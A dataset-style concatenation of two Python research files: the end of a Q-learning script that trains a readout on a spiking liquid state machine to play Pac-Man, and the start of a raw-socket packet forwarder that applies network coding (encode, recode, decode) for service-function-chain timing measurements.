hidden_size), nn.ReLU(), nn.Linear(hidden_size, outp_size), ] self.classifier = nn.Sequential(*list_m) def forward(self, inp): outp = inp.view(inp.size(0), -1) outp = self.classifier(outp) return outp # Wrapper for readout layer which is trained with Q-learning # This class allows easy load and store for trained readout weights for evaluation class ReadoutWrapper(object): def __init__(self, network, optimizer, f, criterion=nn.SmoothL1Loss, gamma=1.0, grad_clipping=1, obs_size=0, hidden_size=0, act_size=0): self.policy_net = network(inp_size=obs_size, hidden_size=hidden_size, outp_size=act_size).to(args.device) f.write('{}\n'.format(self.policy_net)) self.target_net = network(inp_size=obs_size, hidden_size=hidden_size, outp_size=act_size).to(args.device) self.target_net.eval() self.optimizer = optimizer(self.policy_net.parameters(), lr=args.lr, eps=1e-6) self.criterion = criterion().to(args.device) self.gamma = gamma self.grad_clipping = grad_clipping def load(self, path='./checkpoint.pt'): if os.path.isfile(path): checkpoint = torch.load(path,map_location='cpu') self.policy_net.load_state_dict(checkpoint['policy_net']) self.target_net.load_state_dict(checkpoint['target_net']) self.optimizer.load_state_dict(checkpoint['optimizer']) else: print('=> No checkpoint found at {}'.format(path)) sys.exit(0) def save(self, f=sys.stdout, path='./checkpoint.pt'): state = { 'policy_net' : self.policy_net.state_dict(), 'target_net' : self.target_net.state_dict(), 'optimizer' : self.optimizer.state_dict() } torch.save(state, path) # Function to select an action based on epsilon-greedy policy def act(obs, readout, act_size, update_eps=0): if random.random() > update_eps: with torch.no_grad(): return readout.policy_net(obs).max(1)[1].item() else: return random.randrange(act_size) # Train function def train(obses_t, actions, rewards, obses_tp1, readout, batch_size): # Compute mask for non-final states and create batch of inptus done_obs_mask = torch.tensor(tuple(map(lambda s: s is not None, obses_tp1))).to(args.device) done_next_obs_mask = torch.cat([s for s in obses_tp1 if s is not None]).to(args.device) obses_t = torch.cat(obses_t).to(args.device) actions = torch.cat(actions).to(args.device) rewards = torch.cat(rewards).to(args.device) # Compute Q(s_t, a) state_action_values = readout.policy_net(obses_t).gather(1, actions) # Compute V(s_{t+1}) for all next states. next_state_values = torch.zeros(batch_size).to(args.device) next_state_values[done_obs_mask] = readout.target_net(done_next_obs_mask).max(1)[0].detach() # Compute expected Q values based on Bellman equation expected_state_action_values = torch.add(torch.mul(next_state_values,readout.gamma),rewards) # Compute loss loss = readout.criterion(state_action_values, expected_state_action_values.unsqueeze(1)) # Optimize the readout readout.optimizer.zero_grad() loss.backward() for param in readout.policy_net.parameters(): param.grad.data.clamp_(-readout.grad_clipping, readout.grad_clipping) readout.optimizer.step() # Update target network function def update_target(readout): readout.target_net.load_state_dict(readout.policy_net.state_dict()) # Pre-processing function def pre_process(obs): return obs.view(-1) def learn(env): # Open log file to write if args.checkpoint_dir is None: # Use standard output if checkpoint directory is not specified f = sys.stdout else: # Use checkpoint directory name as training log file log_name = '{}_train.log'.format(args.checkpoint_dir) # Do not proceed if training log file exists if not args.overwrite and os.path.isfile(log_name): print('==> File {} exists!'.format(log_name)) sys.exit(0) f = open(log_name, 'w', buffering=1) # Print all input arguments to training log file f.write(str(args)+'\n') # Create liquid model import model_lsm model_spike = model_lsm.LSM(f=f, t_sim=args.t_sim, t_prb=(args.t_prb_start,args.t_prb_stop), inp_size=int(reduce(lambda x, y: x*y, env.observation_space.shape)), rate_scale=args.rate_scale, n_neurons=args.n_neurons, k={'pe':3,'pi':0,'ei':4}, w={'pe':0.6,'pi':0.0, 'ee':0.05,'ei':0.25, 'ie':-0.3,'ii':-0.01}) model_spike.to(args.device) model_spike.eval() f.write('{}\n'.format(model_spike)) # Create readout readout = ReadoutWrapper(f = f, network = MLP, optimizer = torch.optim.RMSprop, criterion = nn.SmoothL1Loss, gamma = args.gamma, grad_clipping = 1.0, obs_size = model_spike.n_e_neurons, hidden_size = args.hidden_size, act_size = env.action_space.n ) # Create the replay buffer replay_buffer = ReplayBuffer(args.buffer_size) # Create the schedule for exploration starting from 1.0 exploration = LinearSchedule(schedule_steps=args.exploration_steps, initial_p=1.0, final_p=args.final_eps) # Initialize the network parameters and copy them to the target network update_target(readout) # Start training with tempfile.TemporaryDirectory() as temp_dir: # Create directory for saving result if args.checkpoint_dir is None: # Use temp directory if checkpoint directory is not specified args.checkpoint_dir = temp_dir else: pathlib.Path(os.path.abspath(args.checkpoint_dir)).mkdir(parents=True, exist_ok=True) f.write('==> Checkpoint path : {}\n'.format(args.checkpoint_dir)) # Reset the environment obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Warm-up LSM for t in range(args.warmup_steps): new_obs, rew, done, _ = env.step(random.randrange(env.action_space.n)) new_obs = pre_process(new_obs) with torch.no_grad(): sumspike_e = model_spike(new_obs.to(args.device)) new_obs = sumspike_e new_inp = None if done else new_obs.unsqueeze(0) obs = new_obs inp = new_inp # Reset environment if done: obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Declare list for storing cumulative rewards for each game episode and episode counter # Note that game episode is different from training epoch # Game episode is a duration when agent start playing the game until the game concludes # Training epoch is a duration when agent is trained and agent state is saved for evaluation episode_rewards = [0.0] num_episodes = 1 # Reset the again before start actual training obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) for t in tqdm(range(args.total_steps)): # Update exploration to the newest value update_eps = exploration.value(t) # Take action based on epsilon-policy action = act(inp, readout, env.action_space.n, update_eps) new_obs, rew, done, _ = env.step(action) new_obs = pre_process(new_obs) with torch.no_grad(): sumspike_e = model_spike(new_obs.to(args.device)) new_obs = sumspike_e new_inp = None if done else new_obs.unsqueeze(0) # Track episode reward episode_rewards[-1] += rew # Store state transition into replay buffer and move on to next state replay_buffer.add(inp, torch.tensor([[action]]), torch.tensor([rew],dtype=torch.float), new_inp) obs = new_obs inp = new_inp # Minimize the error in Bellman's equation on a batch sampled from replay buffer if t > args.start_steps and t % args.train_freq == 0: obses_t, actions, rewards, obses_tp1 = replay_buffer.sample(args.batch_size) train(obses_t, actions, rewards, obses_tp1, readout, args.batch_size) # Update target network periodically if t > args.start_steps and t % args.target_network_update_freq == 0: update_target(readout) # Reset environment if done: obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Print progress to log file for tracking performance during training if num_episodes % args.log_freq == 0: f.write('step {} episode {:.3f} avg_reward {:.3f} max_reward {:.3f} percent_explore {}%\n'.format(t, num_episodes, np.mean(episode_rewards[-args.log_freq:]), np.max(episode_rewards[-args.log_freq:]), int(100*exploration.value(t)))) # Update cumulative reward list and episode counter episode_rewards.append(0.0) num_episodes += 1 # Save model for evaluation if t % args.checkpoint_freq == 0: readout.save(f, os.path.join(args.checkpoint_dir, '{}_checkpoint_{}.pt'.format(args.env_name, t))) f.write('=> Save checkpoint at timestep {}\n'.format(t)) # Close training log file if not args.checkpoint_dir is None: f.close() def test(env): # Read train log file to get saved model path checkpoint_steps = [] with open('{}_train.log'.format(args.checkpoint_dir), 'r') as f: for line in f.readlines(): chunks = line.strip().split() if chunks[0] != '=>': continue checkpoint_steps.append(chunks[-1]) # Open test log file to write log_name='{}_test.log'.format(args.checkpoint_dir) if not args.overwrite and os.path.isfile(log_name): print('==> File {} exists!'.format(log_name)) sys.exit(0) f = open(log_name, 'w', buffering=1) # Crate liquid import model_lsm model_spike = model_lsm.LSM(f=f, t_sim=args.t_sim, t_prb=(args.t_prb_start,args.t_prb_stop), inp_size=int(reduce(lambda x, y: x*y, env.observation_space.shape)), rate_scale=args.rate_scale, n_neurons=args.n_neurons, k={'pe':3,'pi':0,'ei':4}, w={'pe':0.6,'pi':0.0, 'ee':0.05,'ei':0.25, 'ie':-0.3,'ii':-0.01}) model_spike.to(args.device) model_spike.eval() f.write('{}\n'.format(model_spike)) # Create readout readout = ReadoutWrapper(f = f, network = MLP, optimizer = torch.optim.RMSprop, criterion = nn.SmoothL1Loss, gamma = 0, grad_clipping = 0, obs_size = model_spike.n_e_neurons, hidden_size = args.hidden_size, act_size = env.action_space.n ) # Reset the environment obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Warm-up LSM for t in range(args.warmup_steps): new_obs, rew, done, _ = env.step(random.randrange(env.action_space.n)) new_obs = pre_process(new_obs) with torch.no_grad(): sumspike_e = model_spike(new_obs.to(args.device)) new_obs = sumspike_e new_inp = None if done else new_obs.unsqueeze(0) obs = new_obs inp = new_inp # Reset environment if done: obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Run actual testing for every checkpoint for checkpoint_step in tqdm(checkpoint_steps): # Load readlayer for checkpoint readout.load(os.path.join(args.checkpoint_dir, '{}_checkpoint_{}.pt'.format(args.env_name, checkpoint_step))) # Declare list for storing cumulative rewards for each game episode and episode counter episode_rewards = [0.0] num_episodes = 1 # Reset environment obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) for t in range(args.test_steps): # Take action based on epsilon-policy with probability of perform random action = 0.05% action = act(inp, readout, env.action_space.n, 0.00) new_obs, rew, done, _ = env.step(action) new_obs = pre_process(new_obs) with torch.no_grad(): sumspike_e = model_spike(new_obs.to(args.device)) new_obs = sumspike_e new_inp = None if done else new_obs.unsqueeze(0) # Track episode reward episode_rewards[-1] += rew # Move on to the next state obs = new_obs inp = new_inp # Reset environment if done: obs = env.reset() obs = pre_process(obs) with torch.no_grad(): sumspike_e = model_spike(obs.to(args.device)) obs = sumspike_e inp = obs.unsqueeze(0) # Update cumulative reward list and episode counter episode_rewards.append(0.0) num_episodes += 1 # Print average cumulative reward per episodes to log file for tracking performance # Drop last value in list of episode_rewards as the episode may not yet complete f.write('step {} num_episode {} avg_reward {:.3f} max_reward {:.3f}\n'.format(checkpoint_step, num_episodes-1, np.mean(episode_rewards[:-1]), np.max(episode_rewards[:-1]))) # Close testing log file if not args.checkpoint_dir is None: f.close() if __name__ == '__main__': main()
null
run_pacman.py
run_pacman.py
py
22,417
python
en
code
null
code-starcoder2
83
[ { "api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call" }, { "api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 18, "usage_type": "attribute" }, { "api_name": "torch.device", "line_number": 60, "usage_type": "call" }, { "api_name": "torch.cuda.is_available", "line_number": 60, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 60, "usage_type": "attribute" }, { "api_name": "numpy.random.seed", "line_number": 63, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 63, "usage_type": "attribute" }, { "api_name": "random.seed", "line_number": 64, "usage_type": "call" }, { "api_name": "torch.manual_seed", "line_number": 65, "usage_type": "call" }, { "api_name": "torch.cuda.manual_seed_all", "line_number": 66, "usage_type": "call" }, { "api_name": "torch.cuda", "line_number": 66, "usage_type": "attribute" }, { "api_name": "pacman.init_env", "line_number": 69, "usage_type": "call" }, { "api_name": "random.randint", "line_number": 154, "usage_type": "call" }, { "api_name": "torch.nn.Module", "line_number": 158, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 158, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 162, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 162, "usage_type": "name" }, { "api_name": "torch.nn.ReLU", "line_number": 163, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 163, "usage_type": "name" }, { "api_name": "torch.nn.Linear", "line_number": 164, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 164, "usage_type": "name" }, { "api_name": "torch.nn.Sequential", "line_number": 166, "usage_type": "call" }, { "api_name": "torch.nn", "line_number": 166, "usage_type": "name" }, { "api_name": "torch.nn.SmoothL1Loss", "line_number": 175, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 175, "usage_type": "name" }, { "api_name": "os.path.isfile", "line_number": 185, "usage_type": "call" }, { "api_name": "os.path", "line_number": 185, "usage_type": "attribute" }, { "api_name": "torch.load", "line_number": 186, "usage_type": "call" }, { "api_name": "sys.exit", "line_number": 192, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 193, "usage_type": "attribute" }, { "api_name": "torch.save", "line_number": 199, "usage_type": "call" }, { "api_name": "random.random", "line_number": 203, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 204, "usage_type": "call" }, { "api_name": "random.randrange", "line_number": 207, "usage_type": "call" }, { "api_name": "torch.tensor", "line_number": 213, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 214, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 215, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 216, "usage_type": "call" }, { "api_name": "torch.cat", "line_number": 217, "usage_type": "call" }, { "api_name": "torch.zeros", "line_number": 223, "usage_type": "call" }, { "api_name": "torch.add", "line_number": 226, "usage_type": "call" }, { "api_name": "torch.mul", "line_number": 226, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 251, "usage_type": "attribute" }, { "api_name": "os.path.isfile", "line_number": 256, "usage_type": "call" }, { "api_name": "os.path", "line_number": 256, "usage_type": "attribute" }, { "api_name": "sys.exit", "line_number": 258, "usage_type": "call" }, { "api_name": "model_lsm.LSM", "line_number": 266, "usage_type": "call" }, { "api_name": "functools.reduce", "line_number": 268, "usage_type": "call" }, { "api_name": "torch.optim", "line_number": 281, "usage_type": "attribute" }, { "api_name": "torch.nn.SmoothL1Loss", "line_number": 282, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 282, "usage_type": "name" }, { "api_name": "tempfile.TemporaryDirectory", "line_number": 298, "usage_type": "call" }, { "api_name": "pathlib.Path", "line_number": 304, "usage_type": "call" }, { "api_name": "os.path.abspath", "line_number": 304, "usage_type": "call" }, { "api_name": "os.path", "line_number": 304, "usage_type": "attribute" }, { "api_name": "torch.no_grad", "line_number": 310, "usage_type": "call" }, { "api_name": "random.randrange", "line_number": 317, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 319, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 330, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 345, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 350, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 358, "usage_type": "call" }, { "api_name": "torch.tensor", "line_number": 367, "usage_type": "call" }, { "api_name": "torch.float", "line_number": 367, "usage_type": "attribute" }, { "api_name": "torch.no_grad", "line_number": 384, "usage_type": "call" }, { "api_name": "numpy.mean", "line_number": 390, "usage_type": "call" }, { "api_name": "numpy.max", "line_number": 390, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 397, "usage_type": "call" }, { "api_name": "os.path", "line_number": 397, "usage_type": "attribute" }, { "api_name": "os.path.isfile", "line_number": 416, "usage_type": "call" }, { "api_name": "os.path", "line_number": 416, "usage_type": "attribute" }, { "api_name": "sys.exit", "line_number": 418, "usage_type": "call" }, { "api_name": "model_lsm.LSM", "line_number": 423, "usage_type": "call" }, { "api_name": "functools.reduce", "line_number": 425, "usage_type": "call" }, { "api_name": "torch.optim", "line_number": 438, "usage_type": "attribute" }, { "api_name": "torch.nn.SmoothL1Loss", "line_number": 439, "usage_type": "attribute" }, { "api_name": "torch.nn", "line_number": 439, "usage_type": "name" }, { "api_name": "torch.no_grad", "line_number": 450, "usage_type": "call" }, { "api_name": "random.randrange", "line_number": 457, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 459, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 470, "usage_type": "call" }, { "api_name": "tqdm.tqdm", "line_number": 476, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 478, "usage_type": "call" }, { "api_name": "os.path", "line_number": 478, "usage_type": "attribute" }, { "api_name": "torch.no_grad", "line_number": 487, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 497, "usage_type": "call" }, { "api_name": "torch.no_grad", "line_number": 513, "usage_type": "call" }, { "api_name": "numpy.mean", "line_number": 523, "usage_type": "call" }, { "api_name": "numpy.max", "line_number": 523, "usage_type": "call" } ]
596695232
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # vim:fenc=utf-8 """ About: SF program for SFC gap time measurements Email: [email protected] """ import binascii import logging import multiprocessing, threading import socket import struct import sys import time import kodo import json from config import SRC_MAC, DST_MAC, BUFFER_SIZE #from config import CTL_IP, CTL_PORT, NEXT_IP from config import ingress_iface, egress_iface from config import SYMBOL_SIZE, GEN_SIZE, coding_mode, chain_position from config import monitoring_mode, JSONL_FILE_PATH, probing_enabled from config import DECODER_IP_REWRITE ############ # Config # ############ SRC_MAC_B = binascii.unhexlify(SRC_MAC.replace(':', '')) DST_MAC_B = binascii.unhexlify(DST_MAC.replace(':', '')) MAC_LEN = len(DST_MAC_B) # Header lengths in bytes ETH_HDL = 14 UDP_HDL = 8 COD_HDL_MAX = 22 ############# # Logging # ############# fmt_str = '%(asctime)s %(levelname)-8s %(processName)s %(message)s' level = { 'INFO': logging.INFO, 'DEBUG': logging.DEBUG, 'ERROR': logging.ERROR } logger = logging.getLogger(__name__) handler = logging.StreamHandler() formatter = logging.Formatter(fmt_str) handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(level['ERROR']) #logger.setLevel(level['DEBUG']) ##################### # Forward Program # ##################### def bind_raw_sock_pair(in_iface, out_iface): """Create and bind raw socket pairs""" try: recv_sock = socket.socket( socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3) ) send_sock = socket.socket( socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3) ) except socket.error as error: logger.error(error) sys.exit(1) recv_sock.bind((in_iface, 0)) send_sock.bind((out_iface, 0)) logger.debug('Bind in interface: %s, out interface: %s', in_iface, out_iface) return (recv_sock, send_sock) def calc_ih_cksum(hd_b_arr): """Calculate IP header checksum MARK: To generate a new checksum, the checksum field itself is set to zero :para hd_b_arr: Bytes array of IP header :retype: int """ def carry_around_add(a, b): c = a + b return (c & 0xffff) + (c >> 16) s = 0 # set checksum field to zero hd_b_arr[10:12] = struct.pack('>H', 0) for i in range(0, len(hd_b_arr), 2): a, b = struct.unpack('>2B', hd_b_arr[i:i + 2]) w = a + (b << 8) s = carry_around_add(s, w) return ~s & 0xffff def forwards_forward(recv_sock, send_sock, factory=None): """forwards_forward""" # Bytes array for a ethernet frame pack_arr = bytearray(BUFFER_SIZE) current_generation = 0 encoder = None decoder = None if coding_mode == "decode": decoded_symbols = list() if monitoring_mode: time_log = {'encoder': [], 'recoder': [], 'decoder': []} while True: pack_len = recv_sock.recv_into(pack_arr, BUFFER_SIZE) # MARK: Maybe too slow here recv_time = time.perf_counter() eth_typ = struct.unpack('>H', pack_arr[12:14])[0] # IPv4 packet if eth_typ != 2048: continue # Check IP version and calc header length ver_ihl = struct.unpack('>B', pack_arr[ETH_HDL:ETH_HDL + 1])[0] ihl = 4 * int(hex(ver_ihl)[-1]) # IP total length ip_tlen = struct.unpack( '>H', pack_arr[ETH_HDL + 2:ETH_HDL + 4])[0] #logger.debug( # 'Recv a IP packet, header len: %d, total len: %d', ihl, # ip_tlen) proto = struct.unpack( '>B', pack_arr[ETH_HDL + 9:ETH_HDL + 10])[0] # Check if is UDP packet if proto != 17: continue udp_hd_offset = ETH_HDL+ihl # move to UDP header source_port = struct.unpack('>H', pack_arr[udp_hd_offset:udp_hd_offset+2])[0] dest_port = struct.unpack('>H', pack_arr[udp_hd_offset+2:udp_hd_offset+4])[0] # filter out ctl packets #if dest_port == CTL_PORT or source_port == CTL_PORT: # logger.debug("Recv CTL packet. Ignoring.") # continue udp_pl_offset = udp_hd_offset + UDP_HDL # Set checksum to zero # MARK: If the checksum is cleared to zero, then checksuming is disabled. pack_arr[udp_hd_offset + 6:udp_hd_offset + 8] = struct.pack('>H', 0) # UDP payload length udp_pl_len = struct.unpack( '>H', pack_arr[udp_hd_offset + 4:udp_hd_offset + 6] )[0] - UDP_HDL logger.debug("UDP Payload: %s Bytes", udp_pl_len) # extract payload udp_payload = pack_arr[udp_pl_offset:udp_pl_offset+udp_pl_len] if coding_mode == "encode": assert chain_position == 0 if len(udp_payload) > SYMBOL_SIZE: logger.error("Packet too big. Dropping") continue logger.debug("Encoding...") if not encoder: encoder = factory.build() encoder.set_const_symbol(encoder.rank(), bytes(udp_payload)) packets_to_send = 1 if encoder.rank() == encoder.symbols(): red_pkts = max(2, int(encoder_info['gen_size']*redundancy/100)) logger.debug("Sending last packet + %d redundancy packets", red_pkts) packets_to_send += red_pkts for i in range(packets_to_send): coded_payload = encoder.write_payload() logger.debug("Building header...") coding_header = build_header(**encoder_info, redundancy=redundancy, gen_seq=current_generation, probing=probing_enabled) coding_time = int((time.perf_counter()-recv_time)*10**6) logger.debug("Coding time: %d", coding_time) udp_pl_len = len(coding_header) + len(coded_payload) if probing_enabled: udp_pl_len += 2 update_ip_header(pack_arr, ihl, udp_pl_len) proc_time = int((time.perf_counter()-recv_time)*10**6) logger.debug('Process time: %d us.', proc_time) if probing_enabled: update_header(coding_header, proc_time=proc_time) logger.debug("Header: %s", coding_header) udp_payload = coding_header + coded_payload pack_len = udp_pl_offset+udp_pl_len pack_arr[udp_pl_offset : pack_len] = udp_payload if pack_len-ETH_HDL >= 1450: logger.error("Packet too big: %s. Not sending.", pack_len-ETH_HDL) continue pack_arr[0:MAC_LEN] = DST_MAC_B send_sock.send(pack_arr[0:pack_len]) recv_time = time.perf_counter() # for multiple packets if encoder.rank() == encoder.symbols(): logger.info("Generation full. Resetting encoder.") encoder = None current_generation = (current_generation+1)%4 decoded_symbols = [] logger.debug("Generation sequence number: %s", current_generation) elif coding_mode == "forward": coding_header = udp_payload[0:COD_HDL_MAX] header_info = parse_header(coding_header, get_times=monitoring_mode) if header_info['hop_log']['invalid']: logger.debug("Hop log invalid. Dropping packet.") continue cod_hdl = header_info['header_size'] logger.debug("Coding header length: %s", cod_hdl) coding_header = udp_payload[0:cod_hdl] logger.debug("Forwarding...") coded_payload = udp_payload[cod_hdl:] update_header(coding_header, chain_position=chain_position) udp_pl_len = len(coding_header) + len(coded_payload) if header_info['probing']: udp_pl_len += 2 update_ip_header(pack_arr, ihl, udp_pl_len) proc_time = int((time.perf_counter()-recv_time)*10**6) logger.debug('Process time: %d us.', proc_time) if header_info['probing']: update_header(coding_header, proc_time=proc_time) udp_payload = coding_header + coded_payload pack_len = udp_pl_offset+udp_pl_len pack_arr[udp_pl_offset : pack_len] = udp_payload if pack_len-ETH_HDL >= 1450: logger.error("Packet too big: %s. Not sending.", pack_len-ETH_HDL) continue pack_arr[0:MAC_LEN] = DST_MAC_B send_sock.send(pack_arr[0:pack_len]) else: coding_header = udp_payload[0:COD_HDL_MAX] header_info = parse_header(coding_header, get_times=monitoring_mode) if not all(header_info[i] == encoder_info[i] for i in encoder_info): logger.debug("Header mismatch. Dropping packet.") continue if header_info['hop_log']['invalid']: logger.debug("Hop log invalid. Dropping packet.") continue cod_hdl = header_info['header_size'] logger.debug("Coding header length: %s", cod_hdl) coding_header = udp_payload[0:cod_hdl] if header_info['gen_seq'] != current_generation: logger.info("Packet from new generation arrived. Resetting decoder.") decoder = None current_generation = header_info['gen_seq'] decoded_symbols = [] logger.debug("Generation sequence number: %s", current_generation) if not decoder: decoder = factory.build() if coding_mode == "recode": logger.debug("Recoding...") decoder.read_payload(bytes(udp_payload[cod_hdl:])) logger.debug("Rank %s", decoder.rank()) packets_to_send = 1 if decoder.rank() == decoder.symbols(): red_pkts = max(2, int(header_info['gen_size']*header_info['redundancy']/100)) logger.debug("Sending last packet + %d redundancy packets", red_pkts) packets_to_send += red_pkts for i in range(packets_to_send): coded_payload = decoder.write_payload() coding_time = int((time.perf_counter()-recv_time)*10**6) logger.debug("Coding time: %d", coding_time) update_header(coding_header, chain_position=chain_position) udp_pl_len = len(coding_header) + len(coded_payload) if header_info['probing']: udp_pl_len += 2 update_ip_header(pack_arr, ihl, udp_pl_len) proc_time = int((time.perf_counter()-recv_time)*10**6) logger.debug('Process time: %d us.', proc_time) if header_info['probing']: update_header(coding_header, proc_time=proc_time) udp_payload = coding_header + coded_payload pack_len = udp_pl_offset+udp_pl_len pack_arr[udp_pl_offset : pack_len] = udp_payload if pack_len-ETH_HDL >= 1450: logger.error("Packet too big: %s. Not sending.", pack_len-ETH_HDL) continue pack_arr[0:MAC_LEN] = DST_MAC_B send_sock.send(pack_arr[0:pack_len]) recv_time = time.perf_counter() # for multiple packets if decoder.rank() == decoder.symbols(): logger.info("Generation full.") elif coding_mode == "decode": logger.debug("Decoding...") decoder.read_payload(bytes(udp_payload[cod_hdl:])) if decoder.rank() <= len(decoded_symbols): if len(decoded_symbols) == decoder.symbols(): logger.debug("Generation already decoded.") else: logger.debug("Rank didn't increase. Waiting for more packets") continue logger.debug("Rank %s", decoder.rank()) if monitoring_mode and header_info['probing']: time_log['encoder'].append(header_info['times'][0]) time_log['recoder'].append(header_info['times'][1]) for i in range(GEN_SIZE): if i not in decoded_symbols and decoder.is_symbol_uncoded(i): logger.debug("Decoding symbol %s", i) udp_payload = decoder.copy_from_symbol(i) udp_pl_len = len(udp_payload) logger.debug("Payload (%s Bytes): %s", udp_pl_len, udp_payload) if DECODER_IP_REWRITE: pack_arr[ETH_HDL+16:ETH_HDL+20] = socket.inet_aton(DECODER_IP_REWRITE) update_ip_header(pack_arr, ihl, udp_pl_len) proc_time = int((time.perf_counter()-recv_time)*10**6) logger.debug('Process time: %d us.', proc_time) if monitoring_mode: time_log['decoder'].append(proc_time) pack_len = udp_pl_offset+udp_pl_len pack_arr[udp_pl_offset : pack_len] = udp_payload if pack_len-ETH_HDL >= 1450: logger.error("Packet too big: %s. Not sending.", pack_len-ETH_HDL) continue pack_arr[0:MAC_LEN] = DST_MAC_B send_sock.send(pack_arr[0:pack_len]) decoded_symbols.append(i) recv_time = time.perf_counter() logger.debug("Decoded symbols: %s", decoded_symbols) if len(decoded_symbols) == decoder.symbols(): logger.info("All packets decoded.") if monitoring_mode: logger.debug("Writing time log to %s", JSONL_FILE_PATH) with open(JSONL_FILE_PATH, 'a+') as jsonl_file: jsonl_file.write(json.dumps(time_log)) jsonl_file.write('\n') time_log = {'encoder': [], 'recoder': [], 'decoder': []} def update_ip_header(pack_arr, ihl, udp_pl_len): udp_hd_offset = ETH_HDL+ihl new_udp_tlen = struct.pack( '>H', (UDP_HDL + udp_pl_len) ) pack_arr[udp_hd_offset+4 : udp_hd_offset+6] = new_udp_tlen new_ip_tlen = struct.pack('>H', ihl + UDP_HDL + udp_pl_len) pack_arr[ETH_HDL+2:ETH_HDL+4] = new_ip_tlen logger.debug( 'Old IP header checksum: %s', binascii.hexlify( pack_arr[ETH_HDL+10 : ETH_HDL+12] ).decode() ) cksm_start_time = time.perf_counter() new_iph_cksum = calc_ih_cksum(pack_arr[ETH_HDL : ETH_HDL+ihl]) cksm_time = int((time.perf_counter()-cksm_start_time)*10**6) logger.debug('New IP header checksum %s, time: %d', hex(new_iph_cksum), cksm_time) pack_arr[ETH_HDL+10 : ETH_HDL+12] = struct.pack('<H', new_iph_cksum) def echo_listen(socket): while True: payload, (ip, port) = socket.recvfrom(64) logger.debug('Pong %s', payload) if payload.startswith(b'PING'): payload = b"ACK " + payload socket.sendto(payload, (ip, port)) def test_error_rate(receiver, packet_num, timeout=0.5, wait_time=0.05): def wait_for_ack(): global received_acks received_acks = 0 while True: sock.settimeout(timeout) try: reply, sender = sock.recvfrom(64) if sender == receiver and reply.startswith(b"ACK PING"): received_acks += 1 except socket.timeout: pass if all_sent == True: return sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) all_sent = False ack_thread = threading.Thread(target=wait_for_ack) ack_thread.start() for i in range(packet_num): sock.sendto("PING {}".format(i).encode('ascii'), receiver) time.sleep(wait_time) all_sent = True ack_thread.join() sock.close() return 1-received_acks/packet_num def build_header(encoder, field_size, gen_seq, gen_size, symbol_len, redundancy=0, probing=False, proc_time=None): if probing and proc_time: header = bytearray(8) else: header = bytearray(6) assert encoder in range(8) assert field_size in range(4) assert gen_seq in range(4) enc_info = encoder<<4 | field_size<<2 | gen_seq hop_log = 0b10000000 red_prob = redundancy<<1 | bool(probing) header[0:6] = struct.pack('!BBBBH', enc_info, hop_log, gen_size, red_prob, symbol_len) if probing and proc_time: header[6:8] = struct.pack('!H', proc_time) return header def parse_header(header, get_times=False): hi = dict() enc_info, hop_log, hi['gen_size'], \ red_prob, hi['symbol_len'] = struct.unpack('!BBBBH', header[0:6]) hi['encoder'] = enc_info>>4 & 0b1111 hi['field_size'] = enc_info>>2 & 0b11 hi['gen_seq'] = enc_info & 0b11 hi['hop_log'] = {'invalid': False, 'total_hops': 0} for i in range(8): hi['hop_log'][i] = bool(hop_log>>(7-i) & 0b1) if hi['hop_log'][i]: hi['hop_log']['total_hops'] += 1 if i>0 and not hi['hop_log'][i-1]: hi['hop_log']['invalid'] == True hi['probing'] = red_prob&0b1 hi['redundancy'] = red_prob>>1 hi['header_size'] = 6 if hi['probing']: hi['header_size'] += 2*hi['hop_log']['total_hops'] if get_times: pattern = '!'+'H'*hi['hop_log']['total_hops'] hi['times'] = struct.unpack(pattern, header[6:hi['header_size']]) return hi def update_header(header, gen_seq=None, chain_position=None, proc_time=None): if gen_seq != None: assert gen_seq in range(4) [first_byte] = struct.unpack('!B', header[:1]) first_byte = first_byte&0b11111100 | gen_seq header[:1] = struct.pack('!B', first_byte) if chain_position != None: assert 